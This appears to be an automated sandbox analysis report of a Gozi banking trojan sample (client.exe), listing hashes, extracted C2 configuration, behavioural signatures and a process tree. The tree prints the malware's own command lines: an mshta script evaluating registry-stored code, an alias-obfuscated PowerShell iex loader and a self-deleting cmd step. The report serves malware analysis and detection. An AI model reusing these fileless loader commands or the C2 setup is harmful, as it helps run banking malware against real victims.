Overview

overview

10

Static

static

3

client.exe

windows7-x64

10

client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-10-2023 10:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    client.exe

  • Size

    304KB

  • MD5

    27b1d878636e00e43436184b70e9f41c

  • SHA1

    b175d86922e1e837d8d74b588ff746ea7b8670df

  • SHA256

    fe05e50be407f5efcb1870991f86ec721fd7088e92782a60aa815e0a68eb486e

  • SHA512

    086b34070946d275ef50552969c6e561349299eb7eece513ca4504c84ad7810a02428a1540ecd715541139f500137209c94297a331dfa87c18afa2d91e24349e

  • SSDEEP

    6144:R+91vEOpa6NK56upTHirwtRinshvjxdyhgAw8Fi5r+IxsN+:8Dsf4K56u1HqLshvjxia8Mr+/

Score
10/10
gozi5050bankerdaveisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

systemcheck.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Dave packer 1 IoCs

    Detects executable using a packer named 'Dave' by the community, based on a string at the end.

    dave
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3736
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4892
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4068
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3176
        • C:\Users\Admin\AppData\Local\Temp\client.exe
          "C:\Users\Admin\AppData\Local\Temp\client.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4568
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Pgys='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pgys).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F\\\MemoryMusic'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2776
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name kautjj -value gp; new-alias -name magesp -value iex; magesp ([System.Text.Encoding]::ASCII.GetString((kautjj "HKCU:Software\AppDataLow\Software\Microsoft\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F").LinkAbout))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:696
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ecfkhfnu\ecfkhfnu.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3084
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDFD1.tmp" "c:\Users\Admin\AppData\Local\Temp\ecfkhfnu\CSC561C7F846FD444F2ABAE10526EED4D30.TMP"
                5⤵
                  PID:4264
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3mr4tw13\3mr4tw13.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1164
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE0DA.tmp" "c:\Users\Admin\AppData\Local\Temp\3mr4tw13\CSCBD162832A03C403CAFAE449FE2528188.TMP"
                  5⤵
                    PID:3812
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:2608
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:4736
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:5036
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:772
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
              1⤵
                PID:2716
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3396

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\3mr4tw13\3mr4tw13.dll
                Filesize

                3KB

                MD5

                7a2da09ab758ac8cc53f469e16711e85

                SHA1

                4abac3a9cae5323fac5a7642db8b2fb56d73187f

                SHA256

                85225ab6ca854ae64918a6735fc11a9bb7bcaf2d59c9714aefd5f2b27b3c037c

                SHA512

                0e6b9bc64cce2fd0699258c4225c0b4b49e370b6df61eb3228965f9aaf5b61eaac8678c112fe091084d12b00cf683f00a7a91336b84a579b70cdd04b7da654c1

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RESDFD1.tmp
                Filesize

                1KB

                MD5

                0f724730ffa70e6e44cdb9a942988c34

                SHA1

                0c1fd7c0247757ee4f6cb93827023bdc8daf867b

                SHA256

                16224683d025dbfd1cb9443b8f18f0101c4502e405bde330635ee91b36bc3289

                SHA512

                9cfca4a8a4773894935fd05db8c609d94222fdd1fa5f0eef4d4b25b3f6102a509af8e03cee3b5686beb348d581408b70ff46669b159f855b2b5145173bfb21bf

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RESE0DA.tmp
                Filesize

                1KB

                MD5

                ff96fcc39c07e7a4782a94bff407255c

                SHA1

                558321c73c419c95d5d40557ff180e8abc339a04

                SHA256

                1e4799a7636538120f8106be0f93c0d24a62c3f71cb153391fba6fd3995bcc61

                SHA512

                b4515b8b9e7547fa1ac0cad794603efa4ce40ca7d288618190e6ce78429bd39d55c7f021551e57ca171939fa9cd59d21554615f479e24744b44bc7ffa84411da

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b24ty2si.ohr.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\ecfkhfnu\ecfkhfnu.dll
                Filesize

                3KB

                MD5

                935892fd21fda52709e4d948bbef8bd4

                SHA1

                78393ac0c5bcc2296fc51577c72134fce5e5a78b

                SHA256

                6155b87bcc4d7dd3938afbe194340d253e433efc0c79afe505cb447db434ce84

                SHA512

                6f1c6e2116521b6fbd242c931adeabec041dbc6e55d55cae2cd9fe5aec54cffa16d9b06e9c3aa0d688f4f40e2481a7c2656a4ec6bfeca96e70349e1b9d361067

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\3mr4tw13\3mr4tw13.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\3mr4tw13\3mr4tw13.cmdline
                Filesize

                369B

                MD5

                913edaec36879e8e7024b19791e88061

                SHA1

                e3ab47e8f0021aba569a8cc0766b0e1ca6278841

                SHA256

                7109d5f7c97b7260af3338192bcd12aa7736a0e1856604c25b7aa77ae0e298c5

                SHA512

                bd9e6c6c6273b8fec2277fb3c07719ca027c2e5e5d34e3b894ea93361ab8b21bccec7ccbf1fb1bb56075b5ed6023a69756529cff79be9fd462de4efaaca0a4bb

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\3mr4tw13\CSCBD162832A03C403CAFAE449FE2528188.TMP
                Filesize

                652B

                MD5

                373b4f15f9b28bde5523344f92b49115

                SHA1

                8520cb1db6e16d0c321bc6d15d14cdd6a3f447d1

                SHA256

                8e6d5488bd7359bc773a40745df01fa3d30c785f59f5efce7584d00b259b7093

                SHA512

                aa4048dae4f5b4030e2a86846ce435bcf6eecee0ecb5dbbd2d856f61610a3a952b66e2f584ea28788829a6ef53da5788969a0dce1dc823e768a9c56111cb66d1

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\ecfkhfnu\CSC561C7F846FD444F2ABAE10526EED4D30.TMP
                Filesize

                652B

                MD5

                3148f8d17347658342b3532f48d2a256

                SHA1

                5fdd5ce51b2efd4ffb245a161fe8592399ff7402

                SHA256

                1d6911a7ed6820c2391097a2ae4f63edb6c0b7929bd955e1dc3f569fdaeb6d91

                SHA512

                c48ad7627cf71a80a79b80f2ebae0aeabdd568e0eb64304230783eaa8313fadef1dd2c794f43b15ba205ff5848ea7bd00f676505c369648f57ae4bd6e4468c69

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\ecfkhfnu\ecfkhfnu.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\ecfkhfnu\ecfkhfnu.cmdline
                Filesize

                369B

                MD5

                ab18c9c93c089578fcf6a216dbc400ad

                SHA1

                fc927668119c47213cd9ef99dbb7d87d3be41dc0

                SHA256

                d0f593583af61dbe1b29282d143f9dab888bbd6b60313a5e27121ed95cd98e7a

                SHA512

                4fbb35e1185a5e895dfe47e95f0295c415fdbb3a2a666af51202eb592b93eaaedd7489792718b0dfe6d03d5fd625600f7be5001d4d124aee9f7128d247a53fac

                Download Submit
              • memory/696-41-0x000001A554630000-0x000001A554638000-memory.dmp
                Filesize

                32KB

                Download
              • memory/696-70-0x00007FF9C3D80000-0x00007FF9C4841000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/696-28-0x000001A554640000-0x000001A554650000-memory.dmp
                Filesize

                64KB

                Download
              • memory/696-26-0x000001A554640000-0x000001A554650000-memory.dmp
                Filesize

                64KB

                Download
              • memory/696-27-0x000001A554640000-0x000001A554650000-memory.dmp
                Filesize

                64KB

                Download
              • memory/696-21-0x00007FF9C3D80000-0x00007FF9C4841000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/696-16-0x000001A5545A0000-0x000001A5545C2000-memory.dmp
                Filesize

                136KB

                Download
              • memory/696-55-0x000001A554960000-0x000001A554968000-memory.dmp
                Filesize

                32KB

                Download
              • memory/696-57-0x000001A554970000-0x000001A5549AD000-memory.dmp
                Filesize

                244KB

                Download
              • memory/696-71-0x000001A554970000-0x000001A5549AD000-memory.dmp
                Filesize

                244KB

                Download
              • memory/772-92-0x00000284E3660000-0x00000284E3661000-memory.dmp
                Filesize

                4KB

                Download
              • memory/772-91-0x00000284E35B0000-0x00000284E3654000-memory.dmp
                Filesize

                656KB

                Download
              • memory/772-120-0x00000284E35B0000-0x00000284E3654000-memory.dmp
                Filesize

                656KB

                Download
              • memory/2608-103-0x0000019EE7770000-0x0000019EE7771000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2608-119-0x0000019EE76C0000-0x0000019EE7764000-memory.dmp
                Filesize

                656KB

                Download
              • memory/2608-98-0x0000019EE76C0000-0x0000019EE7764000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3176-59-0x0000000008D40000-0x0000000008DE4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3176-60-0x0000000002B80000-0x0000000002B81000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3176-100-0x0000000008D40000-0x0000000008DE4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3396-121-0x000001BD82A40000-0x000001BD82A50000-memory.dmp
                Filesize

                64KB

                Download
              • memory/3396-137-0x000001BD82B40000-0x000001BD82B50000-memory.dmp
                Filesize

                64KB

                Download
              • memory/3736-74-0x00000182ED3F0000-0x00000182ED3F1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3736-73-0x00000182ED610000-0x00000182ED6B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3736-113-0x00000182ED610000-0x00000182ED6B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4068-79-0x000001EBC1E90000-0x000001EBC1F34000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4068-116-0x000001EBC1E90000-0x000001EBC1F34000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4068-80-0x000001EBC1E50000-0x000001EBC1E51000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4568-5-0x0000000000400000-0x000000000040F000-memory.dmp
                Filesize

                60KB

                Download
              • memory/4568-0-0x00000000013F0000-0x00000000013FF000-memory.dmp
                Filesize

                60KB

                Download
              • memory/4568-11-0x0000000003010000-0x000000000301D000-memory.dmp
                Filesize

                52KB

                Download
              • memory/4568-1-0x00000000013E0000-0x00000000013EC000-memory.dmp
                Filesize

                48KB

                Download
              • memory/4736-118-0x000001FE175B0000-0x000001FE17654000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4736-110-0x000001FE175B0000-0x000001FE17654000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4736-111-0x000001FE17430000-0x000001FE17431000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4892-85-0x00000176D7A80000-0x00000176D7B24000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4892-117-0x00000176D7A80000-0x00000176D7B24000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4892-86-0x00000176D7860000-0x00000176D7861000-memory.dmp
                Filesize

                4KB

                Download
              • memory/5036-108-0x0000000001520000-0x00000000015B8000-memory.dmp
                Filesize

                608KB

                Download
              • memory/5036-106-0x0000000000DF0000-0x0000000000DF1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/5036-99-0x0000000001520000-0x00000000015B8000-memory.dmp
                Filesize

                608KB

                Download